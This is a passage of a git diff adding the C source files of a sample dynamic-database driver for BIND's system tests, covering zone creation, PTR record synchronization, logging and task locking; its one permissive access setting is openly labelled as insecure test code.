+} diff --git a/bin/tests/system/dyndb/driver/instance.h b/bin/tests/system/dyndb/driver/instance.h new file mode 100644 index 0000000..ad34573 --- /dev/null +++ b/bin/tests/system/dyndb/driver/instance.h @@ -0,0 +1,76 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) 2009-2015 Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/** + * Driver instance object. + */ + +#ifndef _LD_INSTANCE_H_ +#define _LD_INSTANCE_H_ + +#include <stdbool.h> + +#include <dns/fixedname.h> +#include <dns/name.h> +#include <dns/types.h> + +struct sample_instance { + isc_mem_t *mctx; + char *db_name; + dns_dbimplementation_t *db_imp; + + /* These are needed for zone creation. */ + dns_view_t *view; + dns_zonemgr_t *zmgr; + isc_task_t *task; + bool exiting; + + dns_zone_t *zone1; + dns_fixedname_t zone1_fn; + dns_name_t *zone1_name; + + dns_zone_t *zone2; + dns_fixedname_t zone2_fn; + dns_name_t *zone2_name; +}; + +typedef struct sample_instance sample_instance_t; + +isc_result_t +new_sample_instance(isc_mem_t *mctx, const char *db_name, int argc, char **argv, + const dns_dyndbctx_t *dctx, + sample_instance_t **sample_instp); + +isc_result_t +load_sample_instance_zones(sample_instance_t *inst); + +void +destroy_sample_instance(sample_instance_t **sample_instp); + +#endif /* !_LD_INSTANCE_H_ */ diff --git a/bin/tests/system/dyndb/driver/lock.c b/bin/tests/system/dyndb/driver/lock.c new file mode 100644 index 0000000..5d73871 --- /dev/null +++ b/bin/tests/system/dyndb/driver/lock.c @@ -0,0 +1,81 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +#include "lock.h" + +#include <isc/task.h> +#include <isc/util.h> + +/* + * Lock BIND dispatcher and allow only single task to run. + * + * @warning + * All calls to isc_task_beginexclusive() have to operate on the same task + * otherwise it would not be possible to distinguish recursive locking + * from real conflict on the dispatcher lock. + * For this reason this wrapper function always works with inst->task. + * As a result, this function have to be be called only from inst->task. + * + * Recursive locking is allowed. Auxiliary variable pointed to by "statep" + * stores information if last run_exclusive_enter() operation really locked + * something or if the lock was called recursively and was no-op. + * + * The pair (inst, state) used for run_exclusive_enter() has to be + * used for run_exclusive_exit(). + * + * @param[in] inst The instance with the only task which is allowed to + * run. + * @param[in,out] statep Lock state: ISC_R_SUCCESS or ISC_R_LOCKBUSY + */ +void +run_exclusive_enter(sample_instance_t *inst, isc_result_t *statep) { + REQUIRE(statep != NULL); + REQUIRE(*statep == ISC_R_IGNORE); + + *statep = isc_task_beginexclusive(inst->task); + RUNTIME_CHECK(*statep == ISC_R_SUCCESS || *statep == ISC_R_LOCKBUSY); +} + +/* + * Exit task-exclusive mode. + * + * @param[in] inst The instance used for previous run_exclusive_enter() call. + * @param[in] state Lock state as returned by run_exclusive_enter(). + */ +void +run_exclusive_exit(sample_instance_t *inst, isc_result_t state) { + if (state == ISC_R_SUCCESS) { + isc_task_endexclusive(inst->task); + } else { + /* Unlocking recursive lock or the lock was never locked. */ + INSIST(state == ISC_R_LOCKBUSY || state == ISC_R_IGNORE); + } + + return; +} diff --git a/bin/tests/system/dyndb/driver/lock.h b/bin/tests/system/dyndb/driver/lock.h new file mode 100644 index 0000000..8cf5907 --- /dev/null +++ b/bin/tests/system/dyndb/driver/lock.h @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +#ifndef LOCK_H_ +#define LOCK_H_ + +#include "instance.h" +#include "util.h" + +void +run_exclusive_enter(sample_instance_t *inst, isc_result_t *statep); + +void +run_exclusive_exit(sample_instance_t *inst, isc_result_t state); + +#endif /* LOCK_H_ */ diff --git a/bin/tests/system/dyndb/driver/log.c b/bin/tests/system/dyndb/driver/log.c new file mode 100644 index 0000000..ef8b1ee --- /dev/null +++ b/bin/tests/system/dyndb/driver/log.c @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +#include "log.h" + +#include <isc/util.h> + +#include <dns/log.h> + +void +log_write(int level, const char *format, ...) { + va_list args; + + va_start(args, format); + isc_log_vwrite(dns_lctx, DNS_LOGCATEGORY_DATABASE, DNS_LOGMODULE_DYNDB, + level, format, args); + va_end(args); +} diff --git a/bin/tests/system/dyndb/driver/log.h b/bin/tests/system/dyndb/driver/log.h new file mode 100644 index 0000000..f612a8b --- /dev/null +++ b/bin/tests/system/dyndb/driver/log.h @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +#ifndef _LD_LOG_H_ +#define _LD_LOG_H_ + +#include <isc/error.h> + +#include <dns/log.h> +#include <dns/result.h> + +#define fatal_error(...) isc_error_fatal(__FILE__, __LINE__, __VA_ARGS__) + +#define log_error_r(fmt, ...) \ + log_error(fmt ": %s", ##__VA_ARGS__, dns_result_totext(result)) + +#define log_error(format, ...) log_write(ISC_LOG_ERROR, format, ##__VA_ARGS__) + +#define log_info(format, ...) log_write(ISC_LOG_INFO, format, ##__VA_ARGS__) + +void +log_write(int level, const char *format, ...) ISC_FORMAT_PRINTF(2, 3); + +#endif /* !_LD_LOG_H_ */ diff --git a/bin/tests/system/dyndb/driver/syncptr.c b/bin/tests/system/dyndb/driver/syncptr.c new file mode 100644 index 0000000..cfed153 --- /dev/null +++ b/bin/tests/system/dyndb/driver/syncptr.c @@ -0,0 +1,337 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Automatic A/AAAA/PTR record synchronization. + */ + +#include "syncptr.h" + +#include <isc/event.h> +#include <isc/eventclass.h> +#include <isc/netaddr.h> +#include <isc/task.h> +#include <isc/util.h> + +#include <dns/byaddr.h> +#include <dns/db.h> +#include <dns/name.h> +#include <dns/view.h> +#include <dns/zone.h> + +#include "instance.h" +#include "util.h" + +/* Almost random value. See eventclass.h */ +#define SYNCPTR_WRITE_EVENT (ISC_EVENTCLASS(1025) + 1) + +/* + * Event used for making changes to reverse zones. + */ +typedef struct syncptrevent syncptrevent_t; +struct syncptrevent { + ISC_EVENT_COMMON(syncptrevent_t); + isc_mem_t *mctx; + dns_zone_t *zone; + dns_diff_t diff; + dns_fixedname_t ptr_target_name; /* referenced by owner name in + * tuple */ + isc_buffer_t b; /* referenced by target name in tuple */ + unsigned char buf[DNS_NAME_MAXWIRE]; +}; + +/* + * Write diff generated in syncptr() to reverse zone. + * + * This function will be called asynchronously and syncptr() will not get + * any result from it. + * + */ +static void +syncptr_write(isc_task_t *task, isc_event_t *event) { + syncptrevent_t *pevent = (syncptrevent_t *)event; + dns_dbversion_t *version = NULL; + dns_db_t *db = NULL; + isc_result_t result; + + REQUIRE(event->ev_type == SYNCPTR_WRITE_EVENT); + + UNUSED(task); + + log_write(ISC_LOG_INFO, "ENTER: syncptr_write"); + + result = dns_zone_getdb(pevent->zone, &db); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "syncptr_write: dns_zone_getdb -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + result = dns_db_newversion(db, &version); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "syncptr_write: dns_db_newversion -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + result = dns_diff_apply(&pevent->diff, db, version); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "syncptr_write: dns_diff_apply -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + +cleanup: + if (db != NULL) { + if (version != NULL) { + dns_db_closeversion(db, &version, true); + } + dns_db_detach(&db); + } + dns_zone_detach(&pevent->zone); + dns_diff_clear(&pevent->diff); + isc_event_free(&event); +} + +/* + * Find a reverse zone for given IP address. + * + * @param[in] rdata IP address as A/AAAA record + * @param[out] name Owner name for the PTR record + * @param[out] zone DNS zone for reverse record matching the IP address + * + * @retval ISC_R_SUCCESS DNS name derived from given IP address belongs to an + * reverse zone managed by this driver instance. + * PTR record synchronization can continue. + * @retval ISC_R_NOTFOUND Suitable reverse zone was not found because it + * does not exist or is not managed by this driver. + */ +static isc_result_t +syncptr_find_zone(sample_instance_t *inst, dns_rdata_t *rdata, dns_name_t *name, + dns_zone_t **zone) { + isc_result_t result; + isc_netaddr_t isc_ip; /* internal net address representation */ + dns_rdata_in_a_t ipv4; + dns_rdata_in_aaaa_t ipv6; + + REQUIRE(inst != NULL); + REQUIRE(zone != NULL && *zone == NULL); + + switch (rdata->type) { + case dns_rdatatype_a: + CHECK(dns_rdata_tostruct(rdata, &ipv4, inst->mctx)); + isc_netaddr_fromin(&isc_ip, &ipv4.in_addr); + break; + + case dns_rdatatype_aaaa: + CHECK(dns_rdata_tostruct(rdata, &ipv6, inst->mctx)); + isc_netaddr_fromin6(&isc_ip, &ipv6.in6_addr); + break; + + default: + fatal_error("unsupported address type 0x%x", rdata->type); + break; + } + + /* + * Convert IP address to PTR owner name. + * + * @example + * 192.168.0.1 -> 1.0.168.192.in-addr.arpa + */ + result = dns_byaddr_createptrname(&isc_ip, 0, name); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "syncptr_find_zone: dns_byaddr_createptrname -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + /* Find a zone containing owner name of the PTR record. */ + result = dns_zt_find(inst->view->zonetable, name, 0, NULL, zone); + if (result == DNS_R_PARTIALMATCH) { + result = ISC_R_SUCCESS; + } else if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "syncptr_find_zone: dns_zt_find -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + /* Make sure that the zone is managed by this driver. */ + if (*zone != inst->zone1 && *zone != inst->zone2) { + dns_zone_detach(zone); + log_write(ISC_LOG_INFO, "syncptr_find_zone: zone not managed"); + result = ISC_R_NOTFOUND; + } + +cleanup: + if (rdata->type == dns_rdatatype_a) { + dns_rdata_freestruct(&ipv4); + } else { + dns_rdata_freestruct(&ipv6); + } + + return (result); +} + +/* + * Generate update event for PTR record to reflect change in A/AAAA record. + * + * @pre Reverse zone is managed by this driver. + * + * @param[in] a_name DNS domain of modified A/AAAA record + * @param[in] af Address family + * @param[in] ip_str IP address as a string (IPv4 or IPv6) + * @param[in] mod_op LDAP_MOD_DELETE if A/AAAA record is being deleted + * or LDAP_MOD_ADD if A/AAAA record is being added. + * + * @retval ISC_R_SUCCESS Event for PTR record update was generated and send. + * Change to reverse zone will be done asynchronously. + * @retval other Synchronization failed - reverse doesn't exist, + * is not managed by this driver instance, + * memory allocation error, etc. + */ +static isc_result_t +syncptr(sample_instance_t *inst, dns_name_t *name, dns_rdata_t *addr_rdata, + dns_ttl_t ttl, dns_diffop_t op) { + isc_result_t result; + isc_mem_t *mctx = inst->mctx; + dns_fixedname_t ptr_name; + dns_zone_t *ptr_zone = NULL; + dns_rdata_ptr_t ptr_struct; + dns_rdata_t ptr_rdata = DNS_RDATA_INIT; + dns_difftuple_t *tp = NULL; + isc_task_t *task = NULL; + syncptrevent_t *pevent = NULL; + + dns_fixedname_init(&ptr_name); + DNS_RDATACOMMON_INIT(&ptr_struct, dns_rdatatype_ptr, dns_rdataclass_in); + dns_name_init(&ptr_struct.ptr, NULL); + + pevent = (syncptrevent_t *)isc_event_allocate( + inst->mctx, inst, SYNCPTR_WRITE_EVENT, syncptr_write, NULL, + sizeof(syncptrevent_t)); + isc_buffer_init(&pevent->b, pevent->buf, sizeof(pevent->buf)); + dns_fixedname_init(&pevent->ptr_target_name); + + /* Check if reverse zone is managed by this driver */ + result = syncptr_find_zone(inst, addr_rdata, + dns_fixedname_name(&ptr_name), &ptr_zone); + if (result != ISC_R_SUCCESS) { + log_error_r("PTR record synchronization skipped: reverse zone " + "is not managed by driver instance '%s'", + inst->db_name); + goto cleanup; + } + + /* Reverse zone is managed by this driver, prepare PTR record */ + pevent->zone = NULL; + dns_zone_attach(ptr_zone, &pevent->zone); + dns_name_copynf(name, dns_fixedname_name(&pevent->ptr_target_name)); + dns_name_clone(dns_fixedname_name(&pevent->ptr_target_name), + &ptr_struct.ptr); + dns_diff_init(inst->mctx, &pevent->diff); + result = dns_rdata_fromstruct(&ptr_rdata, dns_rdataclass_in, + dns_rdatatype_ptr, &ptr_struct, + &pevent->b); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "syncptr: dns_rdata_fromstruct -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + /* Create diff */ + result = dns_difftuple_create(mctx, op, dns_fixedname_name(&ptr_name), + ttl, &ptr_rdata, &tp); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "syncptr: dns_difftuple_create -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + dns_diff_append(&pevent->diff, &tp); + + /* + * Send update event to the reverse zone. + * It will be processed asynchronously. + */ + dns_zone_gettask(ptr_zone, &task); + isc_task_send(task, (isc_event_t **)&pevent); + +cleanup: + if (ptr_zone != NULL) { + dns_zone_detach(&ptr_zone); + } + if (tp != NULL) { + dns_difftuple_free(&tp); + } + if (task != NULL) { + isc_task_detach(&task); + } + if (pevent != NULL) { + isc_event_free((isc_event_t **)&pevent); + } + + return (result); +} + +/* + * Generate update event for every rdata in rdataset. + * + * @param[in] name Owner name for A/AAAA records in rdataset. + * @param[in] rdataset A/AAAA records. + * @param[in] op DNS_DIFFOP_ADD / DNS_DIFFOP_DEL for adding / deleting + * the rdata + */ +isc_result_t +syncptrs(sample_instance_t *inst, dns_name_t *name, dns_rdataset_t *rdataset, + dns_diffop_t op) { + isc_result_t result; + dns_rdata_t rdata = DNS_RDATA_INIT; + + for (result = dns_rdataset_first(rdataset); result == ISC_R_SUCCESS; + result = dns_rdataset_next(rdataset)) + { + dns_rdataset_current(rdataset, &rdata); + result = syncptr(inst, name, &rdata, rdataset->ttl, op); + if (result != ISC_R_SUCCESS && result != ISC_R_NOTFOUND) { + goto cleanup; + } + } + if (result == ISC_R_NOMORE) { + result = ISC_R_SUCCESS; + } + +cleanup: + return (result); +} diff --git a/bin/tests/system/dyndb/driver/syncptr.h b/bin/tests/system/dyndb/driver/syncptr.h new file mode 100644 index 0000000..91edee1 --- /dev/null +++ b/bin/tests/system/dyndb/driver/syncptr.h @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Sync PTR records + */ + +#pragma once + +#include <isc/result.h> + +#include <dns/diff.h> +#include <dns/name.h> +#include <dns/rdataset.h> + +#include "instance.h" + +isc_result_t +syncptrs(sample_instance_t *inst, dns_name_t *name, dns_rdataset_t *rdataset, + dns_diffop_t op); diff --git a/bin/tests/system/dyndb/driver/util.h b/bin/tests/system/dyndb/driver/util.h new file mode 100644 index 0000000..1e43e05 --- /dev/null +++ b/bin/tests/system/dyndb/driver/util.h @@ -0,0 +1,85 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Memory allocation and error handling utilities. + */ + +#ifndef _LD_UTIL_H_ +#define _LD_UTIL_H_ + +#include <isc/mem.h> + +#include <dns/types.h> + +#include "log.h" + +#define CLEANUP_WITH(result_code) \ + do { \ + result = (result_code); \ + goto cleanup; \ + } while (0) + +#define CHECK(op) \ + do { \ + result = (op); \ + if (result != ISC_R_SUCCESS) \ + goto cleanup; \ + } while (0) + +#define CHECKED_MEM_GET(m, target_ptr, s) \ + do { \ + (target_ptr) = isc_mem_get((m), (s)); \ + if ((target_ptr) == NULL) { \ + result = ISC_R_NOMEMORY; \ + log_error("Memory allocation failed"); \ + goto cleanup; \ + } \ + } while (0) + +#define CHECKED_MEM_GET_PTR(m, target_ptr) \ + CHECKED_MEM_GET(m, target_ptr, sizeof(*(target_ptr))) + +#define CHECKED_MEM_STRDUP(m, source, target) \ + do { \ + (target) = isc_mem_strdup((m), (source)); \ + if ((target) == NULL) { \ + result = ISC_R_NOMEMORY; \ + log_error("Memory allocation failed"); \ + goto cleanup; \ + } \ + } while (0) + +#define ZERO_PTR(ptr) memset((ptr), 0, sizeof(*(ptr))) + +#define MEM_PUT_AND_DETACH(target_ptr) \ + isc_mem_putanddetach(&(target_ptr)->mctx, target_ptr, \ + sizeof(*(target_ptr))) + +#endif /* !_LD_UTIL_H_ */ diff --git a/bin/tests/system/dyndb/driver/zone.c b/bin/tests/system/dyndb/driver/zone.c new file mode 100644 index 0000000..7f6e1db --- /dev/null +++ b/bin/tests/system/dyndb/driver/zone.c @@ -0,0 +1,265 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Zone management. + */ + +#include "zone.h" +#include <inttypes.h> +#include <stdbool.h> + +#include <isc/util.h> + +#include <dns/dyndb.h> +#include <dns/view.h> +#include <dns/zone.h> + +#include "instance.h" +#include "lock.h" +#include "log.h" +#include "util.h" + +extern const char *impname; + +/* + * Create a new zone with origin 'name'. The zone stay invisible to clients + * until it is explicitly added to a view. + */ +isc_result_t +create_zone(sample_instance_t *const inst, dns_name_t *const name, + dns_zone_t **const rawp) { + isc_result_t result; + dns_zone_t *raw = NULL; + const char *zone_argv[1]; + char zone_name[DNS_NAME_FORMATSIZE]; + dns_acl_t *acl_any = NULL; + + REQUIRE(inst != NULL); + REQUIRE(name != NULL); + REQUIRE(rawp != NULL && *rawp == NULL); + + zone_argv[0] = inst->db_name; + + result = dns_zone_create(&raw, inst->mctx); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, "create_zone: dns_zone_create -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + result = dns_zone_setorigin(raw, name); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "create_zone: dns_zone_setorigin -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + dns_zone_setclass(raw, dns_rdataclass_in); + dns_zone_settype(raw, dns_zone_primary); + dns_zone_setdbtype(raw, 1, zone_argv); + + result = dns_zonemgr_managezone(inst->zmgr, raw); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "create_zone: dns_zonemgr_managezone -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + /* This is completely insecure - use some sensible values instead! */ + result = dns_acl_any(inst->mctx, &acl_any); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, "create_zone: dns_acl_any -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + dns_zone_setupdateacl(raw, acl_any); + dns_zone_setqueryacl(raw, acl_any); + dns_zone_setxfracl(raw, acl_any); + dns_acl_detach(&acl_any); + + *rawp = raw; + return (ISC_R_SUCCESS); + +cleanup: + dns_name_format(name, zone_name, DNS_NAME_FORMATSIZE); + log_error_r("failed to create new zone '%s'", zone_name); + + if (raw != NULL) { + if (dns_zone_getmgr(raw) != NULL) { + dns_zonemgr_releasezone(inst->zmgr, raw); + } + dns_zone_detach(&raw); + } + if (acl_any != NULL) { + dns_acl_detach(&acl_any); + } + + return (result); +} + +/* + * Add zone to the view defined in inst->view. This will make the zone visible + * to clients. + */ +static isc_result_t +publish_zone(sample_instance_t *inst, dns_zone_t *zone) { + isc_result_t result; + bool freeze = false; + dns_zone_t *zone_in_view = NULL; + dns_view_t *view_in_zone = NULL; + isc_result_t lock_state = ISC_R_IGNORE; + + REQUIRE(inst != NULL); + REQUIRE(zone != NULL); + + /* Return success if the zone is already in the view as expected. */ + result = dns_view_findzone(inst->view, dns_zone_getorigin(zone), + &zone_in_view); + if (result != ISC_R_SUCCESS && result != ISC_R_NOTFOUND) { + goto cleanup; + } + + view_in_zone = dns_zone_getview(zone); + if (view_in_zone != NULL) { + /* Zone has a view set -> view 